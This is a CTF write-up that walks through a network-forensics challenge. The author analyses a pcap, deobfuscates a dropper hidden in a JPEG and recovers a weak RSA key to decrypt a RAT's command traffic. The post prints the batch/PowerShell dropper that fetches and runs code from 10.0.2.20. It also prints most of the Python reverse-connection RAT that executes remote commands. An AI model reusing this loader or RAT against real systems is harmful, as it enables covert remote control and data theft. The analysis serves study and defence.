Writeup: Raring ๐
It’s never too late to put out a writeup on a challenge you did… even a whole month after the actual event. This time it is one of the challenges from the Undutmaning, a CTF hosted by three Swedish intelligence/security agencies. Just as with my previous writeup this is a forensics challenge, at least by the CTF organizers definition. But it has some reverse engineering and crypto in it as well, which was honestly a really nice design choice on their part. The challenge felt pretty dynamic and I had to pull out some old schoolbook knowledge to solve some of the steps. So with no further ado, let’s dive into the material!
First step, looking into the provided material ๐
This challenge starts you off with a pcap
file and some allusions that it contains some sort of secret data transmission. A pcap
file is simply a format for storing captured network transmissions, which can then be sifted through by analysts with tools like wireshark. Going over the packets flowing back and forth in the pcap
file gives the impression of pretty normal web interactions
Wireshark lets you very easily export the data that was transmitted over a lot of protocols, including the omnipresent http. And looking into the exported files one pops out very quickly, namely important.rar
. Extracting the archive yields a file called IMPORTANT.md.cmd
, which seems a pretty poor way of obfuscating an executable but I think we’ve all seen worse work just fine for attackers. But there are a few other files as well, like a few HTML documents and a cute picture of a cat (which may prove to be more than it looks at first glance). The HTML files seems to indicate that the extracted files came from some sort of interaction with a very simple online mail client. Someone urges the user “Bob” to have a look at and approve the important report, and links the important.rar
file.
Looking into the important script ๐
As one may guess from the .cmd
file extension, the code within IMPORTANT.md.cmd
is a standard old-fashioned batch script. Well, at least syntactically. In reality it is just there to invoke a powershell command because doing heavy lifting logic in batch is a chore and would also likely make the script more cumbersome to ship. I’ve added some whitespace to the original to make it legible:
@echo off
powershell.exe -command '
if (
(&{python -V} 2>&1 | % gettype) -eq [System.Management.Automation.ErrorRecord]
)
{
Invoke-WebRequest http://10.0.2.20/msupdate.msi -OutFile C:\Temp\msupdate.msi;
Start-Process "C:\Temp\msupdate.exe" -WindowStyle Hidden
}
else
{
$s = (Invoke-WebRequest "http://10.0.2.20/G78GAP3GQV8B.jpg").Content;
$k = $s[-4934..-2467];
$v = $s[-2467..-1];
$o = @();
for ($i = 0; $i -lt 2467; $i++)
{
$o += $k[$i] -bxor $v[$i];
};
$o = [System.Text.Encoding]::ASCII.GetString($o);
python3 -c "print($($o))"
}
'
First it checks the version and therefore presence of a Python interpreter on the system. It does this by asking for a version with the -V flag but then instead of listening to that, it looks at whether or not the command returned with an error. If it detects that Python isn’t installed it goes and grabs it from a controlled server and installs it with the -WindowStyle Hidden flag, which hides the installer from the user. However it seems our user had Python, because otherwise the download of it would likely be a large chunk of the pcap stream. So we go right to the else statement and the business part of the script which begins by downloading that cat picture I mentioned that we extracted right into the variable s
. Then the variable k
and v
are respectively assigned a sequence of bytes from the data of that cat image. The bytes in k
and v
are then bitwise XORed giving a kind of obfuscation that is similar to encryption in implementation but not in purpose. Whereas encryption aims to maintain the confidentiality of data, this simply acts to make the payload hard to detect for file scanners who will think it is just random binary.
This kind of data transfer is a prime example of steganography, which is the practice of hiding data within data. Doing so in a media file like a JPEG or PNG is often very simple, as you can simply append data behind the marker for end of file where an image reader would stop reading the file. In this case, the downloaded G78GAP3GQV8B.jpg
is 86491 bytes in size, but the image of the cat is only 81557 of those bytes, which equates to a 4934 byte payload appended to the end of the file. As you can see in the extractor code, that is exactly where the script starts reading bytes from the image, going until the last byte. There are other ways of hiding data in media files as well, of course. One popular and still hard to detect method is Least Significant Bit (LSB) steganography where you edit the least significant bit for determining the color of every pixel to a bit in the data you wish to hide, which leaves the original file size unchanged and is still practically invisible to the human eye. But looking back to our issue at had, we now understand just what this script is doing and we can also see it ends up converting those extracted bytes to ascii and sending them in as a command into Python. So let’s have a look at exactly what they were executing.
The cat script ๐
I was too lazy to install powershell on my machine, so i quickly rewrote the deobfuscator in Python:
raw_data = open("G78GAP3GQV8B.jpg", "rb").read()
k = raw_data[-4934:-2467]
v = raw_data[-2467: -1]
o = b""
for i in range(0, 2466):
o += (k[i] ^ v[i]).to_bytes()
print(o.decode())
It does the exact same thing as its powershell counterpart and when executed prints that code which had been obfuscated in the cat picture. I have left only the more important code in, because we will be doing very little analysis of the actual code for this part. But I can guarantee that our threat actors ALMOST kept to PEP-8 code standards originally, they even included some error management!
def encrypt_session_key(session_key: bytes) -> bytes:
# TODO: generate new rsa key, p and q are too close..
public_pem = '''-----BEGIN PUBLIC KEY-----
MIIB ...
iwIDAQAB
-----END PUBLIC KEY-----'''
public_key = RSA.import_key(public_pem)
cipher = PKCS1_OAEP.new(public_key)
ciphertext = cipher.encrypt(session_key)
return ciphertext
def encrypt_AES_GCM(key, plaintext):
...
def decrypt_AES_GCM(key, nonce, tag, ciphertext):
...
if __name__ == '__main__':
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
session_key = get_random_bytes(16)
while True:
try:
sock.connect(('10.0.2.20', 443))
break
except:
sleep(60)
rsa_blob = encrypt_session_key(session_key)
sock.sendall(rsa_blob)
while True:
message = sock.recv(4096)
if not message:
break
nonce = message[:16]
tag = message[16:32]
ciphertext = message[32:]
command = decrypt_AES_GCM(session_key, nonce, tag, ciphertext).split()
result = subprocess.check_output(['powershell.exe'] + command, stderr=subprocess.STDOUT)
aes_blob = encrypt_AES_GCM(session_key, result)
sock.sendall(aes_blob)
So looking over this code we can see a few things. Firstly, they left a comment in pointing out an obvious flaw, which is not all that uncommon when you break open malware to look inside. Secondly, we are dealing with some very standard encryption using a pre-shared public key for key encryption, then a symmetric key for stream data. Thirdly, that what they receive and send are commands and output respectively, which places this malware in the category of being a remote access tool, or RAT. It is kind of sneaky at that, because it lets the infected client connect to a server and then receive the commands as opposed to the server initiating the connection. This lets an attacker control a victim that hasn’t changed firewall or NAT settings to allow them through and at the same time allows them to masquerade as a legitimate HTTPS server to any security systems that are watching.
The final stretch ๐
After having a second look at the pcap
file in wireshark we can identify the exact moment the handshake is made and encrypted SSL traffic starts.
What we have learned thus far is that a victim went on a website, got a download for a cmd file that when executed pulled a Python RAT and initiated a connection to a remote server. The connection to that remote server is encrypted with AES with a key that in turn encrypted with RSA. The RSA key used is, according to the malware comment, based on poorly selected primes. I’m not going to go into the specifics of how RSA encryption works here, but for our purposes it is important to know that when a key is not constructed according to best practices, the encryption scheme is vulnerable to a lot of cryptographic attacks. In this case we can extract the private key from the public key because finding the prime factors that make it up is trivial. There is a public database of known factorized numbers, and this one is included! But without the database, it was pretty quick to just use fermat factorization as well. Here is the code I used to get the private key:
from Crypto.PublicKey import RSA
from factordb.factordb import FactorDB
key = RSA.import_key(open("id_rsa.pub").read().strip())
f = FactorDB(key.n)
f.connect()
p, q = f.get_factor_list()
phi = (p - 1) * (q - 1)
d = int(pow(key.e, -1, phi))
priv_key = RSA.construct((key.n, key.e, d))
print(priv_key.export_key().decode())
Now that we have obtained the key that is capable of decrypting the key that was transmitted in the SSL handshake, we can get to work decrypting the entire communication stream! So let’s extract that part from the pcap
file. This could be done in wireshark, but I prefer doing these exctractions with tshark, the cli cousin of wireshark.
tshark -2 -r raring.pcap -R "ssl" -T fields -e tcp.payload > datafile.txt
What we are essentially saying here is: “Give me the tcp payload of the packets where the connection type is ssl” and then we put it in a file for storage. Then, referencing back to the cat script, we write a decryptor that will use that private key we extracted to get the session key, and then decrypt the traffic:
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA
lines = [bytes.fromhex(x.strip()) for x in open("datafile.txt").readlines()]
enc_psk = lines.pop(0) # Get the encrypted session key which was the first thing transmitted
decryptor = PKCS1_OAEP.new(priv_key) # Use a decryptor with the reconstructed private key
dec_psk = decryptor.decrypt(enc_psk) # Get the decrypted session key
def decrypt_AES_GCM(key, nonce, tag, ciphertext): # Steal the decryption function from the RAT
cipher = AES.new(key=key, nonce=nonce, mode=AES.MODE_GCM)
plaintext = cipher.decrypt_and_verify(ciphertext, tag)
return plaintext.decode('utf-8')
for line in lines:
nonce = line[:16]
tag = line[16:32]
ciphertext = line[32:]
print(decrypt_AES_GCM(dec_psk, nonce, tag, ciphertext))
And the result (with some whitespace removed, some command outputs abridged, and a >
to distingish commands from output) is:
> hostname
UU24PC01
> whoami /fqdn
CN=Bob Bobsson,CN=Users,DC=sekmyn,DC=local
> Get-NetIPAddress
IPAddress : fe80::e1cb:257e:e4a8:f121%8
InterfaceIndex : 8
InterfaceAlias : Ethernet
...
> Get-NetNeighbor
ifIndex IPAddress LinkLayerAddress State PolicyStore
------- --------- ---------------- ----- -----------
8 ff02::1:ffa8:f121 33-33-FF-A8-F1-21 Permanent ActiveStore
...
> Net User
User accounts for \\UU24PC01
-----------------------------------------------------------
Administrator Bob DefaultAccount
Guest WDAGUtilityAccount
The command completed successfully.
> Get-PSDrive
Name Used (GB) Free (GB) Provider Root CurrentLocation
---- --------- --------- -------- ---- ---------------
Alias Alias
C 24.65 24.48 FileSystem C:\ Users\bob.SEKMYN
...
> Get-ChildItem Z:\
Directory: Z:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
...
d----- 3/10/2024 6:15 PM admin
> Get-ChildItem Z:\admin\
Directory: Z:\admin
Mode LastWriteTime Length Name
---- ------------- ------ ----
----- 3/10/2024 6:15 PM 28 flag.txt
> Get-Content Z:\admin\flag.txt
undut{Qu4nd0-Qu4nd0-Qu4nd0}
And there is our flag! You can tell by the sequence of commands that they wanted to give the impression of an attacker doing some cautious recon before finding what they were looking for. They make sure they are in the right machine, list the network, then go for the filesystem. This kind of command execution is common in attacks where the attacker has either not done a lot of recon beforehand, and thus is unfamiliar with the system they land on, or have a broader scope for their attack so they couldn’t know the victim system layout in advance. While not conclusive evidence of compromise at all in and of itself, it can serve as a light indicator of compromise to be combined with others to detect attackers before it escalates too far.
Conclusion ๐
Generally, it is hard to find and limit scripts like before it is too late. They run commands, use protocols, and make connections that could just as well be completely benign. This is exactly why a lot of browsers will be really persistent about you trusting the source for a download. While this attack doesn’t try to do fancier things like privilege escalation and completely owning the victim device, it can still be used to hijack user resources and exfiltrate user data. This particular one was meant to be connected to by a person, but in most cases they are operated through some sort of command and control server that keeps the connection alive and orchestrates the infected machines. While this SSL-based connection mechanism will work fine for most machines in most networks, other command and control mechanisms can be used to look even more innocent. One such example is using a discord bot with a webhook to control the infected machine via a discord server. To the victim machine, and other potential intrusion detection systems, the traffic will look like normal discord use and will be practically impossible to spot as malicious by automated systems. In this case the malicious file was sent by a supposedly trusted colleague over mail, but it could have been a discord friend who had their account hijacked or a text message from someone who had their number spoofed.